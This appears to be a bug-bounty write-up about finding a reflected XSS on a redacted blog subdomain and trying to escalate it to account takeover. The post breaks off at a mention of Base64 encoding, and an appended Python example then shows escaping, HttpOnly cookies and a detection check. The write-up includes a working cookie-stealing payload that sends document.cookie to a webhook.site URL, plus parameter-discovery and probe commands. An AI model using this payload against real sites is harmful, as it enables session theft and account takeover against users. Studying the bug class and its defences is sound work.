Hello everyone,
Today, I want to share my experience of discovering an account takeover (ATO) vulnerability through Cross-Site Scripting (XSS). Let’s dive right in!
While hunting for a program with millions of users — specifically a large blog website, which I’ll refer to as redacted.com — I began by enumerating its subdomains. One subdomain I found was jp.redacted.com.
Next, I utilized Param Spider to gather all possible parameters. The command I used was:
```
param spider -d jp.redacted.com -s
```
This command listed all possible parameters in the terminal. Among them, I discovered a parameter called s=, which allowed me to execute reflected XSS (RXSS) with a simple payload:
```
<script>alert(1)</script>
```
Once I had the RXSS, I tried to escalate it to an ATO using a simple cookie-stealing payload:
```
<img src="x" onerror=document.location=%27https://webhook.site/790fbd5e-8cc4-441e-9a81-6ac18f40cb5f?c=%27+document.cookie;">
```
However, this approach did not work, and I tried numerous payloads without success. After some experimentation, I decided to encode my payloads in Base64…
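To make the root cause and the fix concrete, here is an added example (not code from the original post or from the affected site) that models a search page reflecting the `s` parameter. It shows the unescaped reflection that lets the `<script>alert(1)</script>` probe execute, the same page with contextual HTML encoding, and a session cookie set with `HttpOnly` so that even a working XSS cannot read it via `document.cookie`. The host `jp.example.test`, the function names and the sample URL are assumptions constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: a search URL whose "s" parameter carries the
# reflected-XSS probe from the write-up. Hypothetical host, not the real target.
SAMPLE_URL = "https://jp.example.test/?s=<script>alert(1)</script>"


def search_term(url: str) -> str:
    """Extract the 's' query parameter from a URL (empty string if absent)."""
    query = parse_qs(urlsplit(url).query)
    return query.get("s", [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflect the search term into HTML verbatim: the bug class in the post."""
    return f"<h1>Search results for: {term}</h1>"


def render_safe(term: str) -> str:
    """Same page, but the term is encoded for an HTML text-node context."""
    return f"<h1>Search results for: {html.escape(term, quote=True)}</h1>"


def session_cookie(token: str) -> str:
    """Set-Cookie value that keeps the session token out of document.cookie.

    HttpOnly is what defeats the cookie-exfiltration step of an XSS-to-ATO chain;
    Secure and SameSite=Lax are the usual companions.
    """
    return f"session={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


def reflects_unescaped(rendered: str, term: str) -> bool:
    """Detection check: True if a term containing markup survives into the output unchanged."""
    return "<" in term and term in rendered


if __name__ == "__main__":
    term = search_term(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(term))
    print("safe:      ", render_safe(term))
    print("cookie:    ", session_cookie("constructed-token"))
```

`reflects_unescaped` is the kind of check a regression test or a DAST rule can run against every reflected parameter: send a term containing a `<` and fail if it comes back byte-for-byte in the response body.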